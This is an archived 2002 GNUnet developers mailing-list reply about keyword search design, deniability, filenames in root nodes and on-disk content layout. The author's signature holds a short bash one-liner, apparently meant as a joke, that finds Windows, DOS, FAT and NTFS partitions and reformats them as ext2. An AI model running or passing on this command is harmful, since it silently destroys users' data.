gnunet-developers
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [GNUnet-developers] useless crap??


From: Christian Grothoff
Subject: Re: [GNUnet-developers] useless crap??
Date: Mon, 29 Apr 2002 20:34:37 -0500

On Monday 29 April 2002 07:59 pm, you wrote:
> > mp3 is a bad keyword because it would (once the system works) return far
> > too many results. Thus gnunet-insert-mp3 will NOT automatically generate
> > that keyword.
>
> Right. Too many results is what I wanted. :)
>
> Actually mp3 would still be a useful keyword.  I search for "Metalica
> AND mp3" because I want music and not some other datatype.

That's the thing. The GNUnet 'AND' mechanism is not intended to sort
out datatypes. Obtaining 5,000 replies for a generic mp3's search is already 
really bad practice on gnutella, I did not want to encourage people to do 
this. Too generic keywords also void the goal of deniability (people can 
blacklist the query 'mp3'). Thus I decided not to put the 'mp3' keyword as 
default for gnunet-insert-mp3. You can of course manually specify it to 
gnunet-insert.

> But for testing, you need a standard test file that is very likely to
> be on every node.  Like the GPL example.  Just encourage everyone to
> fetch that file as a test everytime a node is installed.  If that
> happens then it is likely to work for new nodes and makes a good smoke
> test to see if things are working.

True - especially once things are working :-)

> > Also we need a better scheme for automatic keyword
> > extraction from files because it is unrealistic that people will type
> > in lots of keywords manually for each file they make available.
>
> True. Your searching requires keywords because the only way data can
> be found is if the person who published the data thought of the same
> keyword that people use to search for it.  Since to begin with most
> content will just be copied from files obtained by other filesharing
> networks, the obvious method is to just split the filename on word
> boundries and add each word.  In these networks that only allow
> searching filenames, people have put keywords in the filenames.

We are aiming for a generic keyword extraction API. Splitting filenames
would definitely be a reasonable choice.

> I actually find it somewhat surprising that filename is NOT stored.
> It could be encoded as part of the description. If I understand your
> arch correctly, you can't do a partial string search on filenames, but
> it would still save the user alot of work.  I would like to be able to
> just use the "standard" name for a file when extracting it.

We could change the format of the root-node to include a default
filename. Sounds reasonable. Any objections/concerns/suggestions?
I could see splitting the 'description' field in 3 parts:
mime, filename and description (each variable length, preceeded
by short indicating length). Any other ideas/suggestions/improvements we 
should make to the RBlocks?

> (In fact, I might want to also save a .meta file for each thing
> downloaded that contains the description and list of keywords, so that
> the file can be uploaded again later idempotently.  What happens if
> two people publish the same file with different keywords and
> descriptions?)

You can find the same file under all keywords used and download it from both 
sources in parallel (GNUnet can assemble from different sources while
guaranteeing file integrity, see the 'Encoding' paper). What you can thus do 
is just insert the file providing *additional* keywords (or none), it can 
still be found as long as the existing keywords are around (and because 
people search more often than they download, keyword-blocks should have a 
high replication rate and thus a higher chance of survival than the 
associated content). Thus a .meta is not required for re-insertion. Worse, 
exposing *all* keywords associated with a file could be used for censorship 
(I download the file, get to know all keywords and then blacklist all of 
them). Thus having keywords for a file that are hard to obtain (i.e. not 
automatically from the file/RNode) is usually a good thing (TM). This may 
actually be a reason for *not* supplying a filename (or at least not one
that was used for keyword extraction). 

> > There may also be performance issues (e.g. how does ext2 behave if
> > data/content contains 1 million 1k files? Use reiserfs? database?);
>
> The thing I see right now is that ~/.gnunet/data/content is a flat
> directory.  In most filesystems, directories are NOT indexed and you
> have to do a linear scan any time you want to find a file.  So you
> should do like every one else and add a couple more directory levels.
> (~/.gnunet/data/content/FE/4F/FE4F8155230050000000000065100000C79CA8BA)
> This way the directory is not too big.  I don't know the ideal number
> of levels or number of bits at each level, but I KNOW a flat directory
> will be really slow on ext2.

That's exactly what I also thought. I'm just not sure that spliting
the directory like that is the best idea (I'm still pondering the
issue, until I have a really good solution, it'll probably just stay in 'slow 
mode'). And of course, using a better FS (reiser, ext3, xfs) is recommended. 
It would be nice to have some profiling code to actually evaluate different 
approaches/filesystems in order to give (educated) advice to users which FS 
to use. 

> I use reiserfs so it isn't really a problem there.  The filesize is
> also problematic in the long run.  Do you intend multiple nodes to
> share this directory.  If not, I would just impliment a large file
> based hash.

While the access could be shared between multiple nodes, this is not really 
making too much sense (except if you have a fat NFS server and multiple 
clients with slow CPUs and you want to balance the load of the encryption, 
and by slow CPUs I mean less than a Pentium because otherwise the CPU load 
should not really matter that much).

What do you mean by 'a large file based hash'? 

> > GNUnet is not really ready for the masses yet.
>
> OK, I will try not to be the masses.

:-)

Christian
-- 
______________________________________________________
|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"



reply via email to

[Prev in Thread] Current Thread [Next in Thread]